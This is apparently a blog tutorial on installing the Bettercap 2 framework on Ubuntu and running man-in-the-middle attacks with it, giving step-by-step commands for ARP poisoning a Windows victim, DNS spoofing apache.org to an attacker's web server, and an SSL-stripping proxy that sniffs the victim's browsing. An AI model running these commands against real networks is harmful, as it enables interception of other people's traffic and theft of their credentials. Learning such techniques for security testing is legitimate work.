In this new tutorial, we will see together how to get started with the Bettercap utility tool in its current version (v2.x). As mentioned by the author of this tool, Bettercap is the Swiss Army knife for Wireless, Bluetooth, Ethernet network reconnaissance and MITM attacks.

Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, Wireless HID devices and Ethernet networks.

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros


BETTERCAP KEYS FEATURES
  • WiFi networks scanning, deauthentication attack, clientless PMKID attack, and automatic WPA/WPA2 handshakes capture.
  • Bluetooth Low Energy devices scanning, characteristics enumeration, reading, and writing.
  • 2.4Ghz wireless devices scanning and MouseJacking attacks with over-the-air HID frames injection (with DuckyScript support).
  • Passive and active IP network hosts probing and recon.
  • ARP, DNS and DHCPv6 spoofers for MITM attacks on IP based networks.
  • Proxies, TCP level and HTTP/HTTPS application-level fully scriptable with easy to implement javascript plugins.
  • A powerful network sniffer for credentials harvesting which can also be used as a network protocol fuzzer.
  • And much more.

You can find all the information about this amazing tool on the official website www.bettercap.org or directly on their Github repository. In this tutorial, we will mainly focus on the installation of Bettercap on Ubuntu or any derived distributions as well as the first steps to know for correct use of this tool.


INSTALLATION OF BETTERCAP 2 ON UBUNTU/DEBIAN AND OTHER DERIVED DISTRIBUTIONS

Method "1" ~ Install from Precompiled Binaries

There is a relatively simple method to install Bettercap on your machine using the precompiled binaries. But I would not spend a lot of time on this solution because it does not represent a real interest. To do it, simply use the below commands.

sudo apt update
sudo apt install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

# Go to https://github.com/bettercap/bettercap/releases
# Grab the URL of the latest precompiled version and change it below if necessary
cd ~/Downloads
wget https://github.com/bettercap/bettercap/releases/download/v2.26.1/bettercap_linux_amd64_v2.26.1.zip
unzip bettercap_linux_amd64_v2.26.1.zip
sudo mv -v bettercap /usr/bin
rm -rf bettercap_linux_amd64_v2.26.1.*

You can now launch bettercap with root privilege using the below command:

sudo bettercap -h

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros


Method "2" ~ Install from Sources

The second method to install Bettercap is to compile everything from the sources. To do this, we will need also to install and configure properly all the needed dependencies. Are you ready?

sudo apt update
sudo apt install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev golang git

When you finished installing the above dependencies, you will need to edit your ".profile" file to add the export path required by golang.

nano ~/.profile

Add the following three lines at the bottom of the file without forgetting to save it before closing it.

# set Golang export PATH
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

Once you are done reload your ".profile" using the below command:

source ~/.profile

We can now start the installation process of Bettercap using the commands below:

go get github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build
sudo make install

Believe it or not but you're done with the installation of Bettercap. You can now launch the tool with root privilege using the below command:

sudo bettercap -h

Installing Bettercap Web Interface

The easiest way to start playing with Bettercap is using its official web user interface. Once you have finished to install the tool using one of the above methods, open your terminal and process with the following commands:

sudo bettercap -eval "caplets.update; ui.update; q"

Only run "caplets.update" the first time as every time the entire system caplets folder is replaced with the downloaded contents from Github, this will overwrite your changes, such as the credentials or other custom settings with default values. When the update is done, the last and final step is to edit the default credentials setting.

sudo nano /usr/local/share/bettercap/caplets/http-ui.cap

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

You can now start the web user interface using the below command. If you have an Apache server or any other application using the port 80 of your machine, it is strongly advised to stop it before starting Bettercap web user interface to avoid any conflict with port 80.

sudo bettercap -caplet http-ui

Open your browser to "http://127.0.0.1/" and log in using the credentials you configured in the previous step.

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros


HOW TO USE THE MODULES

Before starting to see the different attacks, you should know that we are going to use the "modules" function of Bettercap, and these can be configured using the "set" command:

» set dns.spoof.domain victim.com

To enable or disable the module, you simply need to call the module and add the argument "on" or "off" in your command:

» dns.spoof on

ARP POISONING ATTACK

The Address Resolution Protocol (ARP) is a widely used communications protocol for resolving Internet layer addresses into link-layer addresses. This type of attack consists of poisoning the ARP cache of the target machine to route the packets to the hacker machine. Basically, in a local network, all communications take place via the MAC addresses of the machines.

The ARP attack will modify the victim's MAC address table. It is required to change the victim's default gateway MAC address so that you can retrieve all the packets transmitted by the victim.

Important: If you attack the victim without configuring your machine properly as a "router", the attack will be considered as a DOS (Denial Of Service). The requests made by the victim will not be forwarded to the real recipient and will, therefore, be dropped. To avoid this, we will need to enable the router mode of our machine using the below command.

» net.probe on

Once net.probe module is enabled, to find the target we want to attack, we use the following command:

» net.show

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

To process further with this example, our victim will be the machine with the IP address 192.168.1.104, which is a computer connected to the network and running on Windows 10.

» arp.spoof off
» set http.proxy.sslstrip true
» set arp.spoof.internal true
» set arp.spoof.targets 192.168.1.104
» set net.sniff.verbose false
» net.sniff on
» http.proxy on
» arp.spoof on

All traffic from/to 192.168.1.104 will be redirected to you. By default, the target is the network where the attacker is located. In our case, if I hadn't modified "arp.spoof.target", the ARP attack would have been propagated on the 192.168.1.0/24 network.

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

We have carried out a MITM (Man-In-The-Middle) attack. We can "sniff" the network and grab the packets transmitted by the victim machine.


DNS SPOOFING ATTACK

A "DNS Spoofing" attack consists in modifying the DNS table of a machine or an entire network. When the victim wishes to connect for example to the website "http://apache.org", his machine will then be redirected to another IP address (private or public) keeping the same domain name.

We need first to set up properly the DNS Spoofing:

» set dns.spoof.domains apache.org
» set dns.spoof.all true
» dns.spoof on

The command "set dns.spoof.all true" allows taking into account external incoming requests. We keep the ARP spoof attack in place to target the user we are attacking.

» set arp.spoof.targets 192.168.1.104
» arp.spoof on

Since we are redirecting flows from "apache.org" to the attacker's ip, we are going to create a web server using Bettercap. Please remember, to switch off your Apache webserver or any application using the port 80 of your machine to avoid any port conflicts. Otherwise, you must modify the port in the server configuration of Bettercap using the command "set http.server.port".

» set http.server.path /var/www/html
» http.server on

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

Before modifying the victim's ARP table, if the victim had visited the apache.org site, he would then have reached the official page.

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

After poisoning the ARP cache, the apache.org page redirects directly to the local server of the attacker.

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

The DNS attack is now over, I let you imagine what a malicious hacker could do with this type of attack.


PROXY ATTACK

A proxy attack is a fact of being able to recover the logs of all web requests. It is interesting to set up a proxy when you want to block certain websites in a company or a local network. In our case, we will use the proxy to retrieve the pages that the victim consults. To do it, we will need to configure the verbosity level of the sniffer.

» set net.sniff.verbose false
» net.sniff on

Then we configure the proxy:

» set http.proxy.sslstrip true
» http.proxy on

Using the "sslstrip" parameter allows us to enable the https proxy, and to offer the client a certificate generated by Bettercap. Again we keep the ARP attack configuration in place to target the victim. As per the below screenshot, we can see the victim machine is currently visiting Github.com website.

Output

Getting Started with Bettercap 2 on Ubuntu and other Derived Distros

Important: Some of HTTPS sites can be configured to use HSTS protection which can make the attack more complex.

We’ve finished with getting started with the Bettercap tool. I hope you enjoyed it. All manipulations are obviously to be carried out in a local network, of which you are the owner.